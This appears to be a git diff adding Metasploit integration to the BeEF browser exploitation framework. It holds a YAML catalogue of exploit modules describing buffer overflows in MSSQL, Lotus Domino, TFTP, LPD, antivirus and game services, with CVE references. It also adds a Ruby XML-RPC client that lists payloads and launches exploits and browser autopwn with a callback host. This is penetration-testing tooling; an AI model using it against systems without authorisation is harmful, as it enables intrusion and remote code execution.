+ \t\t\t\tattack is finished.\n\n\ + \t\t\t" + authors: + - - CVE + - 2000-0402 + - - OSVDB + - "557" + - - BID + - "1281" + - - CVE + - 2000-1209 + - - OSVDB + - "15757" + - - BID + - "4797" + - - URL + - http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/ + path: extensions/metasploit/ + class: Msf_module +msf_mssql_payload: + enable: true + msf: true + msf_key: windows/mssql/mssql_payload + name: Microsoft SQL Server Payload Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module executes an arbitrary payload on a Microsoft SQL Server by using\n\ + \t\t\t\tthe \"xp_cmdshell\" stored procedure. Currently, three delivery methods are supported.\n\n\ + \t\t\t\tFirst, the original method uses Windows 'debug.com'. File size restrictions are\n\ + \t\t\t\tavoidied by incorporating the debug bypass method presented by SecureStat at\n\ + \t\t\t\tDefcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems.\n\n\ + \t\t\t\tA second method takes advantage of the Command Stager subsystem. This allows using\n\ + \t\t\t\tvarious techniques, such as using a TFTP server, to send the executable. By default\n\ + \t\t\t\tthe Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n\ + \t\t\t\tFinally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n\ + \t\t\t\tpayload on the target.\n\n\ + \t\t\t\tNOTE: This module will leave a payload executable on the target system when the\n\ + \t\t\t\tattack is finished.\n\ + \t\t\t" + authors: + - - CVE + - 2000-0402 + - - OSVDB + - "557" + - - BID + - "1281" + - - CVE + - 2000-1209 + - - OSVDB + - "15757" + - - BID + - "4797" + path: extensions/metasploit/ + class: Msf_module +msf_ms02_039_slammer: + enable: true + msf: true + msf_key: windows/mssql/ms02_039_slammer + name: Microsoft SQL Server Resolution Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis is an exploit for the SQL Server 2000 resolution\n\ + \t\t\t\tservice buffer overflow. This overflow is triggered by\n\ + \t\t\t\tsending a udp packet to port 1434 which starts with 0x04 and\n\ + \t\t\t\tis followed by long string terminating with a colon and a\n\ + \t\t\t\tnumber. This module should work against any vulnerable SQL\n\ + \t\t\t\tServer 2000 or MSDE install (pre-SP3).\n\n\ + \t\t\t" + authors: + - - CVE + - 2002-0649 + - - OSVDB + - "4578" + - - BID + - "5310" + - - MSB + - MS02-039 + path: extensions/metasploit/ + class: Msf_module +msf_ms09_004_sp_replwritetovarbin: + enable: true + msf: true + msf_key: windows/mssql/ms09_004_sp_replwritetovarbin + name: Microsoft SQL Server sp_replwritetovarbin Memory Corruption + category: Metasploit + description: "\n\ + \t\t\t\t\tA heap-based buffer overflow can occur when calling the undocumented\n\ + \t\t\t\t\"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n\ + \t\t\t\tall versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n\ + \t\t\t\tand Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n\ + \t\t\t\tMicrosoft patched this vulnerability in SP3 for 2005 without any public\n\ + \t\t\t\tmention.\n\n\ + \t\t\t\tAn authenticated database session is required to access the vulnerable code.\n\ + \t\t\t\tThat said, it is possible to access the vulnerable code via an SQL injection\n\ + \t\t\t\tvulnerability.\n\n\ + \t\t\t\tThis exploit smashes several pointers, as shown below.\n\n\ + \t\t\t\t1. pointer to a 32-bit value that is set to 0\n\ + \t\t\t\t2. pointer to a 32-bit value that is set to a length influcenced by the buffer\n\ + \t\t\t\t\tlength.\n\ + \t\t\t\t3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n\ + \t\t\t\t\tthis value is referenced with a displacement of 0x38. For MSSQL 2005, the\n\ + \t\t\t\t\tdisplacement is 0x10. The address of our buffer is conveniently stored in\n\ + \t\t\t\t\tecx when this instruction is executed.\n\ + \t\t\t\t4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n\ + \t\t\t\t\ta displacement of 4. This pointer is not used by this exploit.\n\n\ + \t\t\t\tThis particular exploit replaces the previous dual-method exploit. It uses\n\ + \t\t\t\ta technique where the value contained in ecx becomes the stack. From there,\n\ + \t\t\t\treturn oriented programming is used to normalize the execution state and\n\ + \t\t\t\tfinally execute the payload via a \"jmp esp\". All addresses used were found\n\ + \t\t\t\twithin the sqlservr.exe memory space, yielding very reliable code execution\n\ + \t\t\t\tusing only a single query.\n\n\ + \t\t\t\tNOTE: The MSSQL server service does not automatically restart by default. That\n\ + \t\t\t\tsaid, some exceptions are caught and will not result in terminating the process.\n\ + \t\t\t\tIf the exploit crashes the service prior to hijacking the stack, it won't die.\n\ + \t\t\t\tOtherwise, it's a goner.\n\ + \t\t\t" + authors: + - - OSVDB + - "50589" + - - CVE + - 2008-5416 + - - BID + - "32710" + - - MSB + - MS09-004 + - - URL + - http://www.milw0rm.com/exploits/7501 + path: extensions/metasploit/ + class: Msf_module +msf_ms04_011_pct: + enable: true + msf: true + msf_key: windows/ssl/ms04_011_pct + name: Microsoft Private Communications Transport Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the Microsoft\n\ + \t\t\t\tWindows SSL PCT protocol stack. This code is based on Johnny\n\ + \t\t\t\tCyberpunk's THC release and has been tested against Windows\n\ + \t\t\t\t2000 and Windows XP. To use this module, specify the remote\n\ + \t\t\t\tport of any SSL service, or the port and protocol of an\n\ + \t\t\t\tapplication that uses SSL. The only application protocol\n\ + \t\t\t\tsupported at this time is SMTP. You only have one chance to\n\ + \t\t\t\tselect the correct target, if you are attacking IIS, you may\n\ + \t\t\t\twant to try one of the other exploits first (WebDAV). If\n\ + \t\t\t\tWebDAV does not work, this more than likely means that this\n\ + \t\t\t\tis either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS\n\ + \t\t\t\t5.1). Using the wrong target may not result in an immediate\n\ + \t\t\t\tcrash of the remote system.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0719 + - - OSVDB + - "5250" + - - BID + - "10116" + - - MSB + - MS04-011 + path: extensions/metasploit/ + class: Msf_module +msf_domino_http_accept_language: + enable: true + msf: true + msf_key: windows/lotus/domino_http_accept_language + name: IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in IBM Lotus Domino Web Server\n\ + \t\t\t\tprior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP\n\ + \t\t\t\trequest with an Accept-Language header greater than 114 bytes.\n\ + \t\t\t" + authors: + - - CVE + - 2008-2240 + - - OSVDB + - "45415" + - - BID + - "29310" + - - URL + - http://www-01.ibm.com/support/docview.wss?uid=swg21303057 + path: extensions/metasploit/ + class: Msf_module +msf_domino_sametime_stmux: + enable: true + msf: true + msf_key: windows/lotus/domino_sametime_stmux + name: IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Lotus Domino\\'s Sametime\n\ + \t\t\t\tServer. By sending an overly long POST request to the Multiplexer\n\ + \t\t\t\tSTMux.exe service we are able to overwrite SEH. Based on the exploit\n\ + \t\t\t\tby Manuel Santamarina Suarez.\n\ + \t\t\t" + authors: + - - CVE + - 2008-2499 + - - OSVDB + - "45610" + - - BID + - "29328" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-08-028/ + path: extensions/metasploit/ + class: Msf_module +msf_domino_icalendar_organizer: + enable: true + msf: true + msf_key: windows/lotus/domino_icalendar_organizer + name: IBM Lotus Domino iCalendar MAILTO Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability found in IBM Lotus Domino iCalendar. By\n\ + \t\t\t\tsending a long string of data as the \"ORGANIZER;mailto\" header, process \"nRouter.exe\"\n\ + \t\t\t\tcrashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to\n\ + \t\t\t\tgain arbitrary code execution.\n\n\ + \t\t\t\tNote: In order to trigger the vulnerable code path, a valid Domino mailbox account\n\ + \t\t\t\tis needed.\n\ + \t\t\t" + authors: + - - CVE + - 2010-3407 + - - OSVDB + - "68040" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-10-177/ + - - URL + - http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/ + - - URL + - http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515 + path: extensions/metasploit/ + class: Msf_module +msf_sipxezphone_cseq: + enable: true + msf: true + msf_key: windows/sip/sipxezphone_cseq + name: SIPfoundry sipXezPhone 0.35a CSeq Field Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in SIPfoundry's\n\ + \t\t\t\tsipXezPhone version 0.35a. By sending an long CSeq header,\n\ + \t\t\t\ta remote attacker could overflow a buffer and execute\n\ + \t\t\t\tarbitrary code on the system with the privileges of\n\ + \t\t\t\tthe affected application.\n\ + \t\t\t" + authors: + - - CVE + - 2006-3524 + - - OSVDB + - "27122" + - - BID + - "18906" + path: extensions/metasploit/ + class: Msf_module +msf_aim_triton_cseq: + enable: true + msf: true + msf_key: windows/sip/aim_triton_cseq + name: AIM Triton 1.0.4 CSeq Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in AOL\\'s AIM\n\ + \t\t\t\tTriton 1.0.4. By sending an overly long CSeq value,\n\ + \t\t\t\ta remote attacker could overflow a buffer and execute\n\ + \t\t\t\tarbitrary code on the system with the privileges of\n\ + \t\t\t\tthe affected application.\n\ + \t\t\t" + authors: + - - CVE + - 2006-3524 + - - OSVDB + - "27122" + - - BID + - "18906" + path: extensions/metasploit/ + class: Msf_module +msf_sipxphone_cseq: + enable: true + msf: true + msf_key: windows/sip/sipxphone_cseq + name: SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in SIPfoundry's\n\ + \t\t\t\tsipXphone 2.6.0.27. By sending an overly long CSeq value,\n\ + \t\t\t\ta remote attacker could overflow a buffer and execute\n\ + \t\t\t\tarbitrary code on the system with the privileges of\n\ + \t\t\t\tthe affected application.\n\ + \t\t\t" + authors: + - - CVE + - 2006-3524 + - - OSVDB + - "27122" + - - BID + - "18906" + path: extensions/metasploit/ + class: Msf_module +msf_ms10_025_wmss_connect_funnel: + enable: true + msf: true + msf_key: windows/mmsp/ms10_025_wmss_connect_funnel + name: Windows Media Services ConnectFunnel Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the Windows Media\n\ + \t\t\t\tUnicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially\n\ + \t\t\t\tcrafted FunnelConnect request, an attacker can execute arbitrary code\n\ + \t\t\t\tunder the \"NetShowServices\" user account. Windows Media Services 4.1 ships\n\ + \t\t\t\twith Windows 2000 Server, but is not installed by default.\n\n\ + \t\t\t\tNOTE: This service does NOT restart automatically. Successful, as well as\n\ + \t\t\t\tunsuccessful exploitation attempts will kill the service which prevents\n\ + \t\t\t\tadditional attempts.\n\ + \t\t\t" + authors: + - - CVE + - 2010-0478 + - - OSVDB + - "63726" + - - MSB + - MS10-025 + - - URL + - https://www.lexsi.com/abonnes/labs/adviso-cve-2010-0478.txt + path: extensions/metasploit/ + class: Msf_module +msf_attftp_long_filename: + enable: true + msf: true + msf_key: windows/tftp/attftp_long_filename + name: Allied Telesyn TFTP Server 1.9 Long Filename Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a\n\ + \t\t\t\trequest (get/write) for an overly long file name.\n\ + \t\t\t" + authors: + - - CVE + - 2006-6184 + - - OSVDB + - "11350" + - - BID + - "21320" + - - URL + - http://milw0rm.com/exploits/2887 + - - URL + - ftp://guest:guest@ftp.alliedtelesyn.co.uk/pub/utilities/at-tftpd19.zip + path: extensions/metasploit/ + class: Msf_module +msf_quick_tftp_pro_mode: + enable: true + msf: true + msf_key: windows/tftp/quick_tftp_pro_mode + name: Quick FTP Pro 2.1 Transfer-Mode Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the Quick TFTP Pro server\n\ + \t\t\t\tproduct. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting\n\ + \t\t\t\tin a DoS. This is a port of a sploit by Mati \"muts\" Aharoni.\n\ + \t\t\t" + authors: + - - CVE + - 2008-1610 + - - OSVDB + - "43784" + - - BID + - "28459" + - - URL + - http://secunia.com/advisories/29494 + path: extensions/metasploit/ + class: Msf_module +msf_threectftpsvc_long_mode: + enable: true + msf: true + msf_key: windows/tftp/threectftpsvc_long_mode + name: 3CTftpSvc TFTP Long Mode Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. By\n\ + \t\t\t\tsending a specially crafted packet with an overly long mode\n\ + \t\t\t\tfield, a remote attacker could overflow a buffer and execute\n\ + \t\t\t\tarbitrary code on the system.\n\ + \t\t\t" + authors: + - - CVE + - 2006-6183 + - - OSVDB + - "30758" + - - BID + - "21301" + - - URL + - http://secunia.com/advisories/23113/ + path: extensions/metasploit/ + class: Msf_module +msf_dlink_long_filename: + enable: true + msf: true + msf_key: windows/tftp/dlink_long_filename + name: D-Link TFTP 1.0 Long Filename Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in D-Link TFTP 1.0.\n\ + \t\t\t\tBy sending a request for an overly long file name, an attacker\n\ + \t\t\t\tcould overflow a buffer and execute arbitrary code. For best results,\n\ + \t\t\t\tuse bind payloads with nonx (No NX).\n\ + \t\t\t" + authors: + - - CVE + - 2007-1435 + - - OSVDB + - "33977" + - - BID + - "22923" + path: extensions/metasploit/ + class: Msf_module +msf_tftpdwin_long_filename: + enable: true + msf: true + msf_key: windows/tftp/tftpdwin_long_filename + name: TFTPDWIN v0.4.2 Long Filename Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending\n\ + \t\t\t\tan overly long file name to the tftpd.exe server, the stack can be overwritten.\n\ + \t\t\t" + authors: + - - CVE + - 2006-4948 + - - OSVDB + - "29032" + - - BID + - "20131" + - - URL + - http://www.milw0rm.com/exploits/3132 + path: extensions/metasploit/ + class: Msf_module +msf_futuresoft_transfermode: + enable: true + msf: true + msf_key: windows/tftp/futuresoft_transfermode + name: FutureSoft TFTP Server 2000 Transfer-Mode Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the FutureSoft TFTP Server\n\ + \t\t\t\t2000 product. By sending an overly long transfer-mode string, we were able\n\ + \t\t\t\tto overwrite both the SEH and the saved EIP. A subsequent write-exception\n\ + \t\t\t\tthat will occur allows the transferring of execution to our shellcode\n\ + \t\t\t\tvia the overwritten SEH. This module has been tested against Windows\n\ + \t\t\t\t2000 Professional and for some reason does not seem to work against\n\ + \t\t\t\tWindows 2000 Server (could not trigger the overflow at all).\n\ + \t\t\t" + authors: + - - CVE + - 2005-1812 + - - OSVDB + - "16954" + - - BID + - "13821" + - - URL + - http://www.security.org.sg/vuln/tftp2000-1001.html + path: extensions/metasploit/ + class: Msf_module +msf_tftpd32_long_filename: + enable: true + msf: true + msf_key: windows/tftp/tftpd32_long_filename + name: TFTPD32 <= 2.21 Long Filename Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in TFTPD32 version 2.21\n\ + \t\t\t\tand prior. By sending a request for an overly long file name\n\ + \t\t\t\tto the tftpd32 server, a remote attacker could overflow a buffer and\n\ + \t\t\t\texecute arbitrary code on the system.\n\ + \t\t\t" + authors: + - - CVE + - 2002-2226 + - - OSVDB + - "45903" + - - BID + - "6199" + path: extensions/metasploit/ + class: Msf_module +msf_imail_thc: + enable: true + msf: true + msf_key: windows/ldap/imail_thc + name: IMail LDAP Service Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis exploits a buffer overflow in the LDAP service that is\n\ + \t\t\t\tpart of the IMail product. This module was tested against\n\ + \t\t\t\tversion 7.10 and 8.5, both running on Windows 2000.\n\ + \t\t\t" + authors: + - - CVE + - 2004-0297 + - - OSVDB + - "3984" + - - BID + - "9682" + - - URL + - http://secunia.com/advisories/10880/ + path: extensions/metasploit/ + class: Msf_module +msf_pgp_keyserver7: + enable: true + msf: true + msf_key: windows/ldap/pgp_keyserver7 + name: Network Associates PGP KeyServer 7 LDAP Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the LDAP service that is\n\ + \t\t\t\t\tpart of the NAI PGP Enterprise product suite. This module was tested\n\ + \t\t\t\t\tagainst PGP KeyServer v7.0. Due to space restrictions, egghunter is\n\ + \t\t\t\t\tused to find our payload - therefore you may wish to adjust WfsDelay.\n\ + \t\t\t" + authors: + - - CVE + - 2001-1320 + - - OSVDB + - "4742" + - - BID + - "3046" + - - URL + - http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/ + path: extensions/metasploit/ + class: Msf_module +msf_hummingbird_exceed: + enable: true + msf: true + msf_key: windows/lpd/hummingbird_exceed + name: Hummingbird Connectivity 10 SP5 LPD Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Hummingbird Connectivity\n\ + \t\t\t\t10 LPD Daemon. This module has only been tested against Hummingbird\n\ + \t\t\t\tExceed v10 with SP5.\n\ + \t\t\t" + authors: + - - CVE + - 2005-1815 + - - OSVDB + - "16957" + - - BID + - "13788" + path: extensions/metasploit/ + class: Msf_module +msf_saplpd: + enable: true + msf: true + msf_key: windows/lpd/saplpd + name: SAP SAPLPD 6.28 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in SAPlpd 6.28 (SAP Release 6.40) .\n\ + \t\t\t\tBy sending an overly long argument, an attacker may be able to execute arbitrary\n\ + \t\t\t\tcode.\n\ + \t\t\t" + authors: + - - CVE + - 2008-0621 + - - OSVDB + - "41127" + - - BID + - "27613" + path: extensions/metasploit/ + class: Msf_module +msf_wincomlpd_admin: + enable: true + msf: true + msf_key: windows/lpd/wincomlpd_admin + name: WinComLPD <= 3.0.2 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in WinComLPD <= 3.0.2.\n\ + \t\t\t\tBy sending an overly long authentication packet to the remote\n\ + \t\t\t\tadminstration service, an attacker may be able to execute arbitrary\n\ + \t\t\t\tcode.\n\ + \t\t\t" + authors: + - - CVE + - 2008-5159 + - - OSVDB + - "42861" + - - BID + - "27614" + path: extensions/metasploit/ + class: Msf_module +msf_niprint: + enable: true + msf: true + msf_key: windows/lpd/niprint + name: NIPrint LPD Request Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the\n\ + \t\t\t\tNetwork Instrument NIPrint LPD service. Inspired by\n\ + \t\t\t\tImmunity's VisualSploit :-)\n\ + \t\t\t" + authors: + - - CVE + - 2003-1141 + - - OSVDB + - "2774" + - - BID + - "8968" + - - URL + - http://www.immunitysec.com/documentation/vs_niprint.html + path: extensions/metasploit/ + class: Msf_module +msf_trendmicro_serverprotect: + enable: true + msf: true + msf_key: windows/antivirus/trendmicro_serverprotect + name: Trend Micro ServerProtect 5.58 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.\n\ + \t\t\t\tBy sending a specially crafted RPC request, an attacker could overflow the\n\ + \t\t\t\tbuffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-1070 + - - OSVDB + - "33042" + - - BID + - "22639" + path: extensions/metasploit/ + class: Msf_module +msf_symantec_rtvscan: + enable: true + msf: true + msf_key: windows/antivirus/symantec_rtvscan + name: Symantec Remote Management Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Symantec Client Security 3.0.x.\n\ + \t\t\t\tThis module has only been tested against Symantec Client Security 3.0.2\n\ + \t\t\t\tbuild 10.0.2.2000.\n\ + \t\t\t" + authors: + - - CVE + - 2006-2630 + - - OSVDB + - "25846" + - - BID + - "18107" + - - URL + - http://research.eeye.com/html/advisories/published/AD20060612.html + path: extensions/metasploit/ + class: Msf_module +msf_symantec_iao: + enable: true + msf: true + msf_key: windows/antivirus/symantec_iao + name: Symantec Alert Management System Intel Alert Originator Service Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Intel Alert Originator Service msgsys.exe.\n\ + \t\t\t\tWhen an attacker sends a specially crafted alert, arbitrary code may be executed.\n\ + \t\t\t" + authors: + - - CVE + - 2009-1430 + - - OSVDB + - "54159" + - - BID + - "34674" + path: extensions/metasploit/ + class: Msf_module +msf_trendmicro_serverprotect_createbinding: + enable: true + msf: true + msf_key: windows/antivirus/trendmicro_serverprotect_createbinding + name: Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.\n\ + \t\t\t\tBy sending a specially crafted RPC request, an attacker could overflow the\n\ + \t\t\t\tbuffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-2508 + - - OSVDB + - "35790" + - - BID + - "23868" + path: extensions/metasploit/ + class: Msf_module +msf_trendmicro_serverprotect_earthagent: + enable: true + msf: true + msf_key: windows/antivirus/trendmicro_serverprotect_earthagent + name: Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060\n\ + \t\t\t\tEarthAgent.EXE. By sending a specially crafted RPC request, an attacker could overflow the\n\ + \t\t\t\tbuffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-2508 + - - OSVDB + - "35789" + - - BID + - "23866" + path: extensions/metasploit/ + class: Msf_module +msf_racer_503beta5: + enable: true + msf: true + msf_key: windows/games/racer_503beta5 + name: Racer v0.5.3 beta 5 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module explots the Racer Car and Racing Simulator game\n\ + \t\t\t\tversions v0.5.3 beta 5 and earlier. Both the client and server listen\n\ + \t\t\t\ton UDP port 26000. By sending an overly long buffer we are able to\n\ + \t\t\t\texecute arbitrary code remotely.\n\ + \t\t\t" + authors: + - - CVE + - 2007-4370 + - - OSVDB + - "39601" + - - URL + - http://www.milw0rm.com/exploits/4283 + - - BID + - "25297" + path: extensions/metasploit/ + class: Msf_module +msf_mohaa_getinfo: + enable: true + msf: true + msf_key: windows/games/mohaa_getinfo + name: Medal Of Honor Allied Assault getinfo Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack based buffer overflow in the getinfo\n\ + \t\t\t\tcommand of Medal Of Honor Allied Assault.\n\ + \t\t\t" + authors: + - - CVE + - 2004-0735 + - - OSVDB + - "8061" + - - URL + - http://www.milw0rm.com/exploits/357 + - - BID + - "10743" + path: extensions/metasploit/ + class: Msf_module diff --git a/extensions/metasploit/rpcclient.rb b/extensions/metasploit/rpcclient.rb new file mode 100644 index 000000000..cec1f1176 --- /dev/null +++ b/extensions/metasploit/rpcclient.rb @@ -0,0 +1,209 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +module BeEF +module Extension +module Metasploit + + class RpcClient < ::XMLRPC::Client + + include Singleton + + def initialize + @config = BeEF::Core::Configuration.instance.get('beef.extension.metasploit') + + if not (@config.key?('host') or @config.key?('url-path') or @config.key?('port') or @config.key?('user') or @config.key?('pass')) + print_error 'There is not enough information to initalize Metasploit connectivity at this time' + print_error 'Please check your options in config.yaml to verify that all information is present' + BeEF::Core::Configuration.instance.set('beef.extension.metasploit.enabled', false) + BeEF::Core::Configuration.instance.set('beef.extension.metasploit.loaded', false) + return nil + end + + @lock = false + @token = nil + @lastauth = nil + + super(@config['host'],@config['url-path'],@config['port']) + end + + def get_lock() + sleep 0.2 while @lock + @lock = true + end + + def release_lock() + @lock = false + end + + # login into metasploit + def login + get_lock() + res = self.call("auth.login", @config['user'] , @config['pass']) + + if(not (res and res['result'] == "success")) + release_lock() + print_error 'Could not authenticate to Metasploit xmlrpc.' + return false + end + + print_info 'Successful connection with Metasploit.' if not @lastauth + + @token = res['token'] + @lastauth = Time.now + + release_lock() + true + end + + # sends commands to the metasploit xml rpc server + def call(meth, *args) + if(meth != "auth.login") + self.login() if not @token + args.unshift(@token) + end + + begin + super(meth, *args) + rescue Errno::ECONNREFUSED + print_error "Connection to Metasploit backend failed." + return false + rescue XMLRPC::FaultException => e + if e.faultCode == 401 and meth == "auth.login" + print_error "Your username and password combination was rejected by the Metasploit backend server" + elsif e.faultCode == 401 + res = self.login() + else + print_error "An unknown exception has occured while talking to the Metasploit backend." + print_error "The Exception text is (#{e.faultCode} : #{e.faultString}." + print_error "Please check the Metasploit logs for more details." + end + return false + rescue Exception => e + print_error "An unknown exception (#{e}) has occured while talking to the Metasploit backend." + print_error "Please check the Metasploit logs for more details." + return false + end + end + + + def browser_exploits() + + get_lock() + res = self.call('module.exploits') + return [] if not res or not res['modules'] + + mods = res['modules'] + ret = [] + + mods.each do |m| + ret << m if(m.include? '/browser/') + end + + release_lock() + ret.sort + end + + def get_exploit_info(name) + return if not @enabled + get_lock() + res = self.call('module.info','exploit',name) + release_lock() + res || {} + end + + def get_payloads(name) + return if not @enabled + get_lock() + res = self.call('module.compatible_payloads',name) + release_lock() + res || {} + end + + def get_options(name) + return if not @enabled + get_lock() + res = self.call('module.options','exploit',name) + release_lock() + res || {} + end + + def payloads() + return if not @enabled + get_lock() + res = self.call('module.payloads') + release_lock() + return {} if not res or not res['modules'] + res['modules'] + end + + def payload_options(name) + return if not @enabled + get_lock() + res = self.call('module.options','payload',name) + release_lock + return {} if not res + res + end + + def launch_exploit(exploit,opts) + return if not @enabled + get_lock() + begin + res = self.call('module.execute','exploit',exploit,opts) + rescue Exception => e + print_error "Exploit failed for #{exploit} \n" + release_lock() + return false + end + + release_lock() + + uri = "" + if opts['SSL'] + uri += "https://" + else + uri += "http://" + end + + uri += @config.get('beef.extension.metasploit.callback_host') + ":" + opts['SRVPORT'] + "/" + opts['URIPATH'] + + res['uri'] = uri + res + end + + def launch_autopwn + return if not @enabled + opts = { + 'LHOST' => @config.get('beef.extension.metasploit.callback_host') , + 'URIPATH' => @apurl + } + get_lock() + begin + res = self.call('module.execute','auxiliary','server/browser_autopwn',opts) + rescue Exception => e + print_error "Failed to launch autopwn\n" + release_lock() + return false + end + release_lock() + + end + + end + +end +end +end